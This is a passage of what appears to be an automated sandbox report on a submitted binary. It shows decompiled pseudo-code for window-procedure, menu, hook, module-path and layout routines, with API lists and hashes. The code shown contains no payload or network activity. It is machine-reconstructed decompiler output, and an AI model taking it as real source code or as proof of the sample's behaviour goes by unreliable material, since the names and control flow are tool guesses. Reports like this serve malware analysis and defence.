                  • API String ID: 3706238695-0
                  • Opcode ID: 3ada004b77250bfa2beb3bb5427139b91e0f2ee021aaa62671b01238db59777b
                  • Instruction ID: eeb843b551fa435bf3fec831ef0401d74a3c4f4e1e69e6eff3f7a39c04ab7661
                  • Opcode Fuzzy Hash: 3ada004b77250bfa2beb3bb5427139b91e0f2ee021aaa62671b01238db59777b
                  • Instruction Fuzzy Hash: EE21A071600304AFDB20AF71CC41FAF77B9AF44309F00452EBA56672E1DB789950DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040AF79, Relevance: 3.1, APIs: 2, Instructions: 70windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E0040AF79(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
				struct HMENU__* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				struct HMENU__* _t39;
				void* _t42;
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr* _t57;

				_t42 = __ebx;
				_push(__ecx);
				_t57 = __ecx;
				_v8 = 0;
				_t59 = _a24;
				if(_a24 == 0) {
					L4:
					E00402CA0(_t57 + 0xc4, _t57, _a8);
					_t28 = _a20;
					__eflags = _t28;
					if(_t28 != 0) {
						_a24 =  *((intOrPtr*)(_t28 + 0x20));
					} else {
						_a24 = 0;
					}
					_t30 = _a16;
					_t48 =  *((intOrPtr*)(_t30 + 4));
					_t51 =  *_t30;
					_t33 =  *((intOrPtr*)( *_t57 + 0x5c))(_a28, _a4, _a8, _a12, _t51, _t48,  *((intOrPtr*)(_t30 + 8)) - _t51,  *((intOrPtr*)(_t30 + 0xc)) - _t48, _a24, _v8, _a32, _t42);
					__eflags = _t33;
					if(_t33 != 0) {
						_t35 = 1;
						__eflags = 1;
						goto L11;
					} else {
						__eflags = _v8 - _t33;
						if(_v8 != _t33) {
							DestroyMenu(_v8);
						}
						L3:
						_t35 = 0;
						L11:
						return _t35;
					}
				}
				_t39 = LoadMenuA( *(E0041F363(__ebx, 0, __ecx, _t59) + 0xc), _a24);
				_v8 = _t39;
				if(_t39 != 0) {
					goto L4;
				}
				 *((intOrPtr*)( *_t57 + 0x11c))();
				goto L3;
			}
















                  0x0040af79
                  0x0040af7e
                  0x0040af83
                  0x0040af85
                  0x0040af88
                  0x0040af8b
                  0x0040afb4
                  0x0040afbd
                  0x0040afc2
                  0x0040afc5
                  0x0040afc7
                  0x0040afd1
                  0x0040afc9
                  0x0040afc9
                  0x0040afc9
                  0x0040afd4
                  0x0040afd7
                  0x0040afda
                  0x0040b004
                  0x0040b008
                  0x0040b00a
                  0x0040b01e
                  0x0040b01e
                  0x00000000
                  0x0040b00c
                  0x0040b00c
                  0x0040b00f
                  0x0040b014
                  0x0040b014
                  0x0040afb0
                  0x0040afb0
                  0x0040b01f
                  0x0040b022
                  0x0040b022
                  0x0040b00a
                  0x0040af99
                  0x0040af9f
                  0x0040afa4
                  0x00000000
                  0x00000000
                  0x0040afaa
                  0x00000000

                  APIs
                  • LoadMenuA.USER32 ref: 0040AF99
                  • DestroyMenu.USER32(?,?,?,?,?,?,?,?,?), ref: 0040B014
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$DestroyLoad
                  • String ID:
                  • API String ID: 588275208-0
                  • Opcode ID: 011dedb1d4b93fb0fec950f638cbb21010f1c2d5a66f29dead3501da4ea3d920
                  • Instruction ID: 118bc1eea92f049343cb41fc0e01d682e6849735effaaea45bedc3916b800edf
                  • Opcode Fuzzy Hash: 011dedb1d4b93fb0fec950f638cbb21010f1c2d5a66f29dead3501da4ea3d920
                  • Instruction Fuzzy Hash: F52168B521020AEFCF11CF65C9488AABBB5FF88354B108466F815A7261D738DD21DF65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426D44, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00426D44(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				void* _t40;
				void* _t52;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;

				_t59 = __eflags;
				_t52 = __edx;
				_t44 = __ebx;
				_push(0x10);
				E00431A9B(E0044C2F5, __ebx, __edi, __esi);
				_t56 = __ecx;
				 *(_t57 - 0x14) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) + 0xa;
				 *(_t57 - 0x10) = E00404461(_t59,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) + 0xa);
				_t32 = E0041F363(__ebx, __edi, _t56, _t59);
				_t54 = 0;
				 *((intOrPtr*)(_t57 - 0x18)) =  *((intOrPtr*)(_t32 + 4));
				if( *((intOrPtr*)(_t56 + 4)) > 0) {
					do {
						_t9 = _t54 + 1; // 0x1
						_t44 = _t9;
						swprintf( *(_t57 - 0x10),  *(_t57 - 0x14),  *(_t56 + 0x10), _t44);
						_t58 = _t58 + 0x10;
						_t40 = E00426700( *((intOrPtr*)(_t57 - 0x18)), _t57 - 0x1c,  *((intOrPtr*)(_t56 + 0xc)),  *(_t57 - 0x10), 0x44f0f5); // executed
						 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
						E004057D4( *((intOrPtr*)(_t56 + 8)) + _t54 * 4, _t40);
						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
						E004010B0( *((intOrPtr*)(_t57 - 0x1c)) + 0xfffffff0, _t52);
						_t54 = _t44;
						_t61 = _t54 -  *((intOrPtr*)(_t56 + 4));
					} while (_t54 <  *((intOrPtr*)(_t56 + 4)));
				}
				return E00431B73(E00404490(_t44, _t54, _t56, _t61,  *(_t57 - 0x10)));
			}











                  0x00426d44
                  0x00426d44
                  0x00426d44
                  0x00426d44
                  0x00426d4b
                  0x00426d50
                  0x00426d5c
                  0x00426d65
                  0x00426d68
                  0x00426d70
                  0x00426d75
                  0x00426d78
                  0x00426d7a
                  0x00426d7d
                  0x00426d7d
                  0x00426d88
                  0x00426d93
                  0x00426da3
                  0x00426da8
                  0x00426db3
                  0x00426dbb
                  0x00426dc2
                  0x00426dc7
                  0x00426dc9
                  0x00426dc9
                  0x00426d7a
                  0x00426ddc

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00426D4B
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • swprintf.LIBCMT ref: 00426D88
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3__vsprintf_s_l_mallocswprintf
                  • String ID:
                  • API String ID: 367293577-0
                  • Opcode ID: 3a214aab7a86e2a5f63ff26eeba659317651d5fcca418b5b44d70a51458bef8e
                  • Instruction ID: 9573cca5b79f8fc0a76bfd734ff5aaffca9d9069506fe4030a5ee5cff69ba3c8
                  • Opcode Fuzzy Hash: 3a214aab7a86e2a5f63ff26eeba659317651d5fcca418b5b44d70a51458bef8e
                  • Instruction Fuzzy Hash: B711A371D0060A9FCB10EFA5C882E6FB3F5FF44318F10492EF121A72A1CB38A9408B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004292E7, Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E004292E7(intOrPtr __ebx, intOrPtr __edx, struct HINSTANCE__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr _t32;
				signed int _t36;

				_t26 = __edx;
				_t19 = __ebx;
				_t34 = _t36;
				_t8 =  *0x463404; // 0x38a11573
				_v8 = _t8 ^ _t36;
				_t28 = _a8;
				GetModuleFileNameA(_a4,  &_v268, 0x104);
				_t14 = GetShortPathNameA( &_v268, E004014F0(_a8, 0x104), 0x104); // executed
				if(_t14 == 0) {
					E00402830(_t26, _t28,  &_v268);
				}
				_t15 = E0040A356(_t28, 0xffffffff);
				_pop(_t29);
				_pop(_t32);
				return E00430650(_t15, _t19, _v8 ^ _t34, _t26, _t29, _t32);
			}















                  0x004292e7
                  0x004292e7
                  0x004292ea
                  0x004292f2
                  0x004292f9
                  0x00429301
                  0x00429312
                  0x00429329
                  0x00429331
                  0x0042933c
                  0x0042933c
                  0x00429345
                  0x0042934d
                  0x00429350
                  0x00429357

                  APIs
                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                  • GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Name$FileModulePathShort
                  • String ID:
                  • API String ID: 4073693819-0
                  • Opcode ID: 905a4995cd81f9c0174dea4ed714b7411b98bcdaeadfe175916a8af081c008a5
                  • Instruction ID: 8e1aa580d8501399bd92b9dd3bfa18adfe58bb0007ac89ee96572330ca29169d
                  • Opcode Fuzzy Hash: 905a4995cd81f9c0174dea4ed714b7411b98bcdaeadfe175916a8af081c008a5
                  • Instruction Fuzzy Hash: FCF0A4766000146BCB10EFAADC45DEFB7ADEF99324F04416AF845E32C1DF78AA418B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00410F0D, Relevance: 3.0, APIs: 2, Instructions: 32threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00410F0D(void* __eflags, intOrPtr _a4) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HHOOK__* _t6;
				void* _t8;
				void* _t10;
				intOrPtr _t11;
				void* _t12;
				struct HHOOK__* _t13;

				_t6 = E00420AEC(_t8, 0x466508, _t10, _t12, __eflags, 0x406452);
				_t13 = _t6;
				_t15 = _t13;
				if(_t13 == 0) {
					_t6 = E00406436(_t8, 0x466508, _t10, _t13, _t15);
				}
				_t11 = _a4;
				if( *((intOrPtr*)(_t13 + 0x14)) == _t11) {
					return _t6;
				} else {
					if( *(_t13 + 0x28) == 0) {
						_t6 = SetWindowsHookExA(5, E00410CBA, 0, GetCurrentThreadId()); // executed
						 *(_t13 + 0x28) = _t6;
						_t18 = _t6;
						if(_t6 == 0) {
							_t6 = E004063FE(_t8, 0x466508, _t11, _t13, _t18);
						}
					}
					 *((intOrPtr*)(_t13 + 0x14)) = _t11;
					return _t6;
				}
			}












                  0x00410f1e
                  0x00410f23
                  0x00410f25
                  0x00410f27
                  0x00410f29
                  0x00410f29
                  0x00410f2e
                  0x00410f34
                  0x00410f64
                  0x00410f36
                  0x00410f3a
                  0x00410f4c
                  0x00410f52
                  0x00410f55
                  0x00410f57
                  0x00410f59
                  0x00410f59
                  0x00410f57
                  0x00410f5e
                  0x00000000
                  0x00410f5e

                  APIs
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                  • GetCurrentThreadId.KERNEL32 ref: 00410F3C
                  • SetWindowsHookExA.USER32 ref: 00410F4C
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$CurrentException@8HookThreadThrowWindows
                  • String ID:
                  • API String ID: 1415497866-0
                  • Opcode ID: 37f3d0fc7647bf2c85f398416bb1e7c84d4a3ea5ec68988cbb3fd77fc1d52bf8
                  • Instruction ID: 6c588268bc8433113d32a2b5924d2362cc050002e169fed3ae89e1c569c52b8e
                  • Opcode Fuzzy Hash: 37f3d0fc7647bf2c85f398416bb1e7c84d4a3ea5ec68988cbb3fd77fc1d52bf8
                  • Instruction Fuzzy Hash: 9CF0273260071077C7302F67A806B577798EBC0B61F11013FFA0656280D6F8D8C1C6AE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040CCC8, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040CCC8(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
				_Unknown_base(*)()* _t11;
				long _t12;
				intOrPtr* _t17;

				_t17 = __ecx;
				_t11 =  *(__ecx + 0x40);
				if(_t11 != 0) {
					L3:
					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
					return _t12;
				}
				_t11 =  *( *((intOrPtr*)( *__ecx + 0xf8))());
				if(_t11 != 0) {
					goto L3;
				}
				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
			}






                  0x0040ccce
                  0x0040ccd0
                  0x0040ccd5
                  0x0040ccf9
                  0x0040cd06
                  0x00000000
                  0x0040cd06
                  0x0040ccdf
                  0x0040cce3
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • DefWindowProcA.USER32(?,?,?,?), ref: 0040CCF1
                  • CallWindowProcA.USER32 ref: 0040CD06
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ProcWindow$Call
                  • String ID:
                  • API String ID: 2316559721-0
                  • Opcode ID: 31c9da80100a9d816eb6298f82ff38ddf85138840a761073849e75ee9fde59f5
                  • Instruction ID: a59e30d0e50e3c6695c8649c18ee593f55ddf464080dc148df40e0021e8dadaa
                  • Opcode Fuzzy Hash: 31c9da80100a9d816eb6298f82ff38ddf85138840a761073849e75ee9fde59f5
                  • Instruction Fuzzy Hash: 8CF0F836100205FFDF115FA5DC48DAA7FB9FF08350B148529FA5996120E732D820AB44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00413276, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00413276(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t15;
				intOrPtr _t19;
				void* _t22;
				void* _t23;

				_push(0);
				E00431A9B(E0044B200, __ebx, __edi, __esi);
				_t22 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0x94));
				_t13 =  *((intOrPtr*)(_t23 + 8));
				 *((intOrPtr*)(__ecx + 0x88)) =  *((intOrPtr*)(_t23 + 8));
				if( *((intOrPtr*)(__ecx + 0x94)) == 0) {
					_t15 = E00404461(_t25, 0xb0); // executed
					_t19 = _t15;
					 *((intOrPtr*)(_t23 + 8)) = _t19;
					 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
					if(_t19 == 0) {
						_t13 = 0;
						__eflags = 0;
					} else {
						_t13 = E0042519C(_t19, _t22);
					}
					 *((intOrPtr*)(_t22 + 0x94)) = _t13;
				}
				if( *((intOrPtr*)(_t22 + 0x38)) == 0) {
					 *((intOrPtr*)(_t22 + 0x38)) = GetParent( *(_t22 + 0x20));
				}
				return E00431B73(_t13);
			}







                  0x00413276
                  0x0041327d
                  0x00413282
                  0x00413284
                  0x0041328b
                  0x0041328e
                  0x00413294
                  0x0041329b
                  0x004132a1
                  0x004132a3
                  0x004132a6
                  0x004132ac
                  0x004132b6
                  0x004132b6
                  0x004132ae
                  0x004132af
                  0x004132af
                  0x004132b8
                  0x004132b8
                  0x004132c2
                  0x004132cd
                  0x004132cd
                  0x004132d5

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041327D
                  • GetParent.USER32(?), ref: 004132C7
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Parent_malloc
                  • String ID:
                  • API String ID: 4058389177-0
                  • Opcode ID: c689719606693e2765ef589d72a80aa2abebd4b93b4cbd792dbfe7422f500bb7
                  • Instruction ID: 5fd53afc60951b9d1215e33b10396915e24fbcf05b250d538ea7ccb8a05cbf96
                  • Opcode Fuzzy Hash: c689719606693e2765ef589d72a80aa2abebd4b93b4cbd792dbfe7422f500bb7
                  • Instruction Fuzzy Hash: 67F082305017149FEB60AF31C54579B76E0BF0431AF50847FE94A866A1DB7CA5848B4D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00407887, Relevance: 3.0, APIs: 2, Instructions: 19libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00407887(void* __ecx) {
				struct HINSTANCE__* _t11;
				signed int _t12;
				void* _t15;

				_t15 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_t11 = GetModuleHandleA( *(__ecx + 0xc)); // executed
					 *(_t15 + 4) = _t11;
					if(_t11 == 0) {
						_t12 = LoadLibraryA( *(_t15 + 0xc));
						 *(_t15 + 4) = _t12;
						 *((char*)(_t15 + 8)) = _t12 & 0xffffff00 | _t12 != 0x00000000;
					}
				}
				return  *(_t15 + 4);
			}






                  0x0040788a
                  0x00407890
                  0x00407895
                  0x0040789b
                  0x004078a0
                  0x004078a5
                  0x004078ad
                  0x004078b3
                  0x004078b3
                  0x004078a0
                  0x004078ba

                  APIs
                  • GetModuleHandleA.KERNELBASE(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 00407895
                  • LoadLibraryA.KERNEL32(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 004078A5
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 4133054770-0
                  • Opcode ID: 51c6b0a14c209bda3158205d76c13f49e01c4838667900211617a1ac94583d4c
                  • Instruction ID: b2e4a917816264131c583018976e3fb6b99e390f365dd9a40fef115991fd453c
                  • Opcode Fuzzy Hash: 51c6b0a14c209bda3158205d76c13f49e01c4838667900211617a1ac94583d4c
                  • Instruction Fuzzy Hash: A9E08C32901B01CFD7319F25E808A43BBE4BF04B20B10C83EE8AAD3A20E730E840CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004161F7, Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E004161F7(void* __esi, void* __eflags) {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;
				void* _t7;
				void* _t8;

				_t3 = E0041F363(_t7, _t8, __esi, __eflags);
				_t13 =  *((char*)(_t3 + 0x14));
				if( *((char*)(_t3 + 0x14)) == 0) {
					_push(__esi);
					_t4 = E0041EDAB(_t7, _t8, __esi, _t13);
					_t6 = SetWindowsHookExA(0xffffffff, E0041605F, 0, GetCurrentThreadId()); // executed
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}








                  0x004161f7
                  0x004161fc
                  0x00416200
                  0x00416202
                  0x00416203
                  0x0041621a
                  0x00416220
                  0x00000000
                  0x00416223
                  0x00416224

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentHookThreadWindows
                  • String ID:
                  • API String ID: 1904029216-0
                  • Opcode ID: e16487a409085e34aeffa5215726b9f530c3ec48cf8e42557f90223b3f04fdec
                  • Instruction ID: 0d4e1b78ceb5744933d127dfd959b1211db20431d59c43cc5bd31d8bd1737379
                  • Opcode Fuzzy Hash: e16487a409085e34aeffa5215726b9f530c3ec48cf8e42557f90223b3f04fdec
                  • Instruction Fuzzy Hash: 88D0A7354043106ED7206B727C09B963F50BB86338F150A5EF921522D6C52C85C24F5D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004217B7, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E004217B7(void* __ebx, intOrPtr* __ecx, void* __edi, signed int _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				signed int _t74;
				signed char _t79;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr* _t91;
				intOrPtr _t92;
				signed int _t96;
				signed int _t97;
				intOrPtr _t101;
				intOrPtr _t104;
				intOrPtr _t109;
				signed int _t110;
				struct HDWP__** _t112;

				_t112 = _a8;
				_push(_t112);
				_v8 = __ecx;
				_t74 =  *((intOrPtr*)( *__ecx + 0x16c))();
				_a8 = _t74;
				if((_t74 & 0x10000000) == 0 || (_t74 & 0x0000f000) == 0) {
					L28:
					return 0;
				} else {
					CopyRect( &_v32, _t112 + 4);
					_t109 = _v32.right - _v32.left;
					_t88 = _v32.bottom - _v32.top;
					_t91 = _v8;
					_t79 =  *(_t91 + 0x84);
					_t96 = 0 |  *((intOrPtr*)(_t112 + 0x1c)) != 0x00000000;
					if((_t79 & 0x00000004) == 0 || (_t79 & 0x00000001) == 0) {
						if((_a8 & 0x0000a000) == 0) {
							_t97 = _t96 | 0x00000010;
						} else {
							_t97 = _t96 | 0x0000000a;
						}
					} else {
						_t97 = _t96 | 0x00000006;
					}
					 *((intOrPtr*)( *_t91 + 0x140))( &_v16, 0xffffffff, _t97);
					_t92 = _v16;
					if(_t92 >= _t109) {
						_t92 = _t109;
						_v16 = _t92;
					}
					_t82 = _v12;
					if(_t82 >= _t88) {
						_t82 = _t88;
						_v12 = _t82;
					}
					_t110 = _a8;
					if((_t110 & 0x0000a000) == 0) {
						if((_t110 & 0x00005000) != 0) {
							_t101 =  *((intOrPtr*)(_t112 + 0x18));
							 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t112 + 0x14)) + _t92;
							if(_t101 <= _t82) {
								_t101 = _t82;
							}
							 *((intOrPtr*)(_t112 + 0x18)) = _t101;
							if((_t110 & 0x00001000) == 0) {
								if((_t110 & 0x00004000) != 0) {
									 *((intOrPtr*)(_t112 + 0xc)) =  *((intOrPtr*)(_t112 + 0xc)) - _t92;
									_v32.left = _v32.right - _t92;
								}
							} else {
								 *(_t112 + 4) =  *(_t112 + 4) + _t92;
							}
						}
					} else {
						_t104 =  *((intOrPtr*)(_t112 + 0x14));
						 *((intOrPtr*)(_t112 + 0x18)) =  *((intOrPtr*)(_t112 + 0x18)) + _t82;
						if(_t104 <= _t92) {
							_t104 = _t92;
						}
						 *((intOrPtr*)(_t112 + 0x14)) = _t104;
						if((_t110 & 0x00002000) == 0) {
							if((_t110 & 0x00008000) != 0) {
								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t112 + 0x10)) - _t82;
								_v32.top = _v32.bottom - _t82;
							}
						} else {
							 *((intOrPtr*)(_t112 + 8)) =  *((intOrPtr*)(_t112 + 8)) + _t82;
						}
					}
					_v32.right = _v32.left + _t92;
					_v32.bottom = _v32.top + _t82;
					if( *_t112 != 0) {
						E0040CEE2(_t112,  *((intOrPtr*)(_v8 + 0x20)),  &_v32);
					}
					goto L28;
				}
			}




















                  0x004217c2
                  0x004217c5
                  0x004217c6
                  0x004217c9
                  0x004217cf
                  0x004217d7
                  0x004218f4
                  0x004218f8
                  0x004217e8
                  0x004217f2
                  0x004217fe
                  0x00421801
                  0x00421804
                  0x00421807
                  0x00421812
                  0x00421817
                  0x00421829
                  0x00421830
                  0x0042182b
                  0x0042182b
                  0x0042182b
                  0x0042181d
                  0x0042181d
                  0x0042181d
                  0x0042183c
                  0x00421842
                  0x00421847
                  0x00421849
                  0x0042184b
                  0x0042184b
                  0x0042184e
                  0x00421853
                  0x00421855
                  0x00421857
                  0x00421857
                  0x0042185a
                  0x00421863
                  0x0042189c
                  0x0042189e
                  0x004218a1
                  0x004218a6
                  0x004218a8
                  0x004218a8
                  0x004218aa
                  0x004218b3
                  0x004218c0
                  0x004218c7
                  0x004218ca
                  0x004218ca
                  0x004218b5
                  0x004218b5
                  0x004218b5
                  0x004218b3
                  0x00421865
                  0x00421865
                  0x00421868
                  0x0042186d
                  0x0042186f
                  0x0042186f
                  0x00421871
                  0x0042187a
                  0x00421887
                  0x0042188e
                  0x00421891
                  0x00421891
                  0x0042187c
                  0x0042187c
                  0x0042187c
                  0x0042187a
                  0x004218db
                  0x004218de
                  0x004218e2
                  0x004218ef
                  0x004218ef
                  0x00000000
                  0x004218e2

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CopyRect
                  • String ID:
                  • API String ID: 1989077687-0
                  • Opcode ID: 6375a65d15a0f0f061cf90aeb32674f20a7cbe1805a7c2e37a1dc44e5b91dcc2
                  • Instruction ID: b6c8682c3a5f8d4b9bbb0fe91b9393bb500e1cc71d8d3095f72ca3a43206c229
                  • Opcode Fuzzy Hash: 6375a65d15a0f0f061cf90aeb32674f20a7cbe1805a7c2e37a1dc44e5b91dcc2
                  • Instruction Fuzzy Hash: 44419A31E003159FCB28DFA9D484AAFB7F6BF94300F64852ED41693364E738A945CB89
                  Uniqueness

